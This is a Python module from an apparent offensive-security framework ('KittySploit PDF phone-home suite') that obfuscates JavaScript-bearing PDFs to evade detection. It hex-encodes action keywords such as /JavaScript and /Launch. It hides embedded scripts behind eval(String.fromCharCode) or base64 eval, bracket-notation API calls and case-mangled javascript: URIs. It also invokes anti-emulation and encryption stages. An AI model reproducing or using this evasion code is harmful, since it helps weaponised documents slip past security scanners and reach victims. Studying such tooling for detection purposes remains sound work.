"""PDF obfuscation and metadata helpers for authorized penetration testing."""

from __future__ import annotations

import base64
import bz2
import ipaddress
import os
import random
import re
import zlib
from pathlib import Path
from urllib.parse import urlparse

__version__ = "1.0.1"

KNOWN_SCHEMES = (
    "http://", "https://", "ftp://", "ftps://", "file://", "smb://",
    "ssh://", "telnet://", "gopher://", "ldap://", "mailto:", "news:",
    "nntp://", "irc://", "data:", "javascript:",
)

_PDF_COMMENT = b"% Generated by KittySploit PDF phone-home suite\n"
_PDF_INFO = b" /Info << /Creator (KittySploit) /Producer (KittySploit PDF) >>"
_FOOTER_LABEL = b"Generated by KittySploit PDF phone-home suite"


def validate_url_or_ip(input_string: str) -> bool:
    try:
        ipaddress.ip_address(input_string)
        return True
    except ValueError:
        pass
    parsed = urlparse(input_string)
    if parsed.scheme and parsed.netloc:
        return True
    lowered = input_string.lower()
    for scheme in KNOWN_SCHEMES:
        if lowered.startswith(scheme) and len(input_string) > len(scheme):
            return True
    return False


def ensure_scheme(host: str) -> str:
    if not host.lower().startswith(KNOWN_SCHEMES):
        return f"https://{host}"
    return host


def _name_to_hex(name_bytes: bytes) -> bytes:
    if not name_bytes.startswith(b"/"):
        return name_bytes
    encoded = b"/"
    for byte in name_bytes[1:]:
        if random.random() < 0.7:
            encoded += b"#" + format(byte, "02x").encode()
        else:
            encoded += bytes([byte])
    return encoded


def _string_to_octal(match: re.Match[bytes]) -> bytes:
    content = match.group(1)
    result = b"("
    for byte in content:
        if byte in (0x28, 0x29, 0x5C):
            result += b"\\" + bytes([byte])
        elif random.random() < 0.6:
            result += b"\\" + format(byte, "03o").encode()
        else:
            result += bytes([byte])
    result += b")"
    return result


def _string_to_hex(match: re.Match[bytes]) -> bytes:
    content = match.group(1)
    hex_bytes = b"<"
    for byte in content:
        hex_bytes += format(byte, "02x").encode()
        if random.random() < 0.3:
            hex_bytes += b" "
    hex_bytes += b">"
    return hex_bytes


def _obfuscate_js_payload(js_bytes: bytes) -> bytes:
    codes = ",".join(str(b) for b in js_bytes)
    return f"eval(String.fromCharCode({codes}))".encode()


def _obfuscate_js_payload_b64(js_bytes: bytes) -> bytes:
    b64 = base64.b64encode(js_bytes).decode("ascii")
    return (
        f'eval(util.stringFromStream('
        f'util.streamFromString("{b64}"),"base64"))'
    ).encode("latin-1")


_BROWSER_API_HINTS = (b"fetch(", b"XMLHttpRequest", b"new Image", b"WebSocket")


def _rewrite_js_blocks(data: bytes, transform) -> bytes:
    pattern = re.compile(rb"/JS\s*\(")
    out = bytearray()
    pos = 0
    while True:
        m = pattern.search(data, pos)
        if not m:
            out.extend(data[pos:])
            break
        out.extend(data[pos : m.end()])
        depth = 1
        i = m.end()
        while i < len(data) and depth > 0:
            c = data[i]
            if c == 0x5C:
                i += 2
                continue
            if c == 0x28:
                depth += 1
            elif c == 0x29:
                depth -= 1
                if depth == 0:
                    break
            i += 1
        if depth != 0:
            out.extend(data[m.end() :])
            return bytes(out)
        content = data[m.end() : i]
        out.extend(transform(content))
        out.extend(b")")
        pos = i + 1
    return bytes(out)


def _obfuscate_js_bracket_notation(js_bytes: bytes) -> bytes:
    js = js_bytes.decode("latin-1")
    replacements = [
        ("this.submitForm", 'this["submitForm"]'),
        ("this.getURL", 'this["getURL"]'),
        ("app.launchURL", 'app["launchURL"]'),
        ("app.openDoc", 'app["openDoc"]'),
        ("app.media.getURLData", 'app["media"]["getURLData"]'),
        ("app.setTimeOut", 'app["setTimeOut"]'),
        ("SOAP.connect", 'SOAP["connect"]'),
        ("SOAP.request", 'SOAP["request"]'),
        ("SOAP.streamDecode", 'SOAP["streamDecode"]'),
        ("RSS.addFeed", 'RSS["addFeed"]'),
        ("util.readFileIntoStream", 'util["readFileIntoStream"]'),
        ("util.stringFromStream", 'util["stringFromStream"]'),
        ("util.streamFromString", 'util["streamFromString"]'),
        ("this.importDataObject", 'this["importDataObject"]'),
    ]
    for old, new in replacements:
        js = js.replace(old, new)
    return js.encode("latin-1")


def _obfuscate_js_uri(uri_bytes: bytes) -> bytes:
    uri = uri_bytes.decode("latin-1")
    if uri.lower().startswith("javascript:"):
        prefix = uri[:11]
        payload = uri[11:]
        obf_prefix = "".join(
            c.upper() if random.random() < 0.5 else c.lower() for c in prefix[:-1]
        ) + ":"
        if random.random() < 0.5:
            pos = random.randint(1, len(obf_prefix) - 2)
            char = random.choice(["\t", "\n"])
            obf_prefix = obf_prefix[:pos] + char + obf_prefix[pos:]
        return (obf_prefix + payload).encode("latin-1")
    return uri_bytes


def obfuscate_pdf(filepath: Path, level: int) -> None:
    try:
        data = filepath.read_bytes()
    except Exception:
        return
    if not data.startswith(b"%PDF"):
        return

    if level >= 6:
        from lib.pdf.obfuscation.annot_stage import stage_js_getannots

        data = stage_js_getannots(data)

    if level >= 7:
        from lib.pdf.obfuscation.anti_emulation import wrap_js_anti_emulation

        data = _rewrite_js_blocks(data, wrap_js_anti_emulation)

    if level >= 4:
        def _stage_js_content(js_content: bytes) -> bytes:
            if any(hint in js_content for hint in _BROWSER_API_HINTS):
                return _obfuscate_js_payload(js_content)
            return _obfuscate_js_payload_b64(js_content)

        data = _rewrite_js_blocks(data, _stage_js_content)

    if level >= 2:
        data = _rewrite_js_blocks(data, _obfuscate_js_bracket_notation)
        data = re.sub(
            rb"javascript:[^\)\"]+",
            lambda m: _obfuscate_js_uri(m.group(0)),
            data,
        )

    if level >= 1:
        keywords = [
            b"/JavaScript", b"/OpenAction", b"/Launch", b"/SubmitForm",
            b"/GoToR", b"/GoToE", b"/ImportData", b"/Thread",
            b"/RichMedia", b"/EmbeddedFile", b"/XFA", b"/OCProperties",
        ]
        for kw in keywords:
            if kw in data:
                data = data.replace(kw, _name_to_hex(kw), 1)
        data = re.sub(rb"/JS\s*\(", lambda m: _name_to_hex(b"/JS") + b" (", data)
        data = re.sub(rb"/AA\s*<", lambda m: _name_to_hex(b"/AA") + b" <", data)

        def _maybe_hex_string(m: re.Match[bytes]) -> bytes:
            if random.random() < 0.5:
                return _string_to_hex(m)
            return _string_to_octal(m)

        data = re.sub(
            rb"(/URI\s*)\((https?://[^()]*)\)",
            lambda m: m.group(1)
            + _maybe_hex_string(re.match(rb"\((.*)\)", b"(" + m.group(2) + b")")),
            data,
        )

    if level >= 3:
        def _compress_stream(m: re.Match[bytes]) -> bytes:
            dict_content = m.group(1)
            stream_data = m.group(2)
            if b"/Filter" in dict_content or len(stream_data) < 50:
                return m.group(0)
            try:
                compressed = zlib.compress(stream_data)
                new_dict = re.sub(
                    rb"/Length\s+\d+",
                    b"/Length " + str(len(compressed)).encode(),
                    dict_content,
                )
                if b"/Length" not in new_dict:
                    new_dict = new_dict.rstrip(b" >") + b" /Length " + str(len(compressed)).encode()
                new_dict += b" /Filter /FlateDecode"
                return b"<< " + new_dict + b" >>\nstream\n" + compressed + b"\nendstream"
            except Exception:
                return m.group(0)

        data = re.sub(
            rb"<<\s*(.*?)\s*>>\s*stream\n(.*?)\nendstream",
            _compress_stream,
            data,
            flags=re.DOTALL,
        )

    if level >= 5:
        from lib.pdf.obfuscation.encryption import encrypt_pdf_bytes

        data, _backend = encrypt_pdf_bytes(data)

    filepath.write_bytes(data)


def _append_visible_footer(data: bytes) -> bytes:
    obj_re = re.compile(
        rb"(\d+\s+0\s+obj\s*<<)([^>]*?)(/Length\s+)(\d+)([^>]*?)(>>\s*\nstream\n)(.*?)(\nendstream)",
        re.DOTALL,
    )
    for m in obj_re.finditer(data):
        dict_body = m.group(2) + m.group(5)
        body = m.group(7)
        if b"/Filter" in dict_body or b"BT" not in body or b"ET" not in body:
            continue
        font_match = re.search(rb"(/F\d+)\s+\d+(?:\.\d+)?\s+Tf", body)
        if not font_match:
            continue
        font_name = font_match.group(1)
        footer_ops = b"\n  BT " + font_name + b" 8 Tf 30 15 Td (" + _FOOTER_LABEL + b") Tj ET"
        new_body = body + footer_ops
        new_obj = (
            m.group(1) + m.group(2) + m.group(3) + str(len(new_body)).encode()
            + m.group(5) + m.group(6) + new_body + m.group(8)
        )
        return data[: m.start()] + new_obj + data[m.end() :]
    return data


def inject_credit(output_dir: Path) -> None:
    for filepath in output_dir.iterdir():
        if filepath.suffix == ".svg":
            continue
        try:
            data = filepath.read_bytes()
            newline_idx = data.index(b"\n") + 1
            data = data[:newline_idx] + _PDF_COMMENT + data[newline_idx:]
            trailer_idx = data.rfind(b"trailer")
            if trailer_idx != -1:
                trailer_section = data[trailer_idx:]
                if b"/Info" not in trailer_section:
                    last_close = trailer_section.rfind(b">>")
                    if last_close != -1:
                        insert_pos = trailer_idx + last_close
                        data = data[:insert_pos] + _PDF_INFO + b"\n  " + data[insert_pos:]
            data = _append_visible_footer(data)
            filepath.write_bytes(data)
        except Exception:
            pass
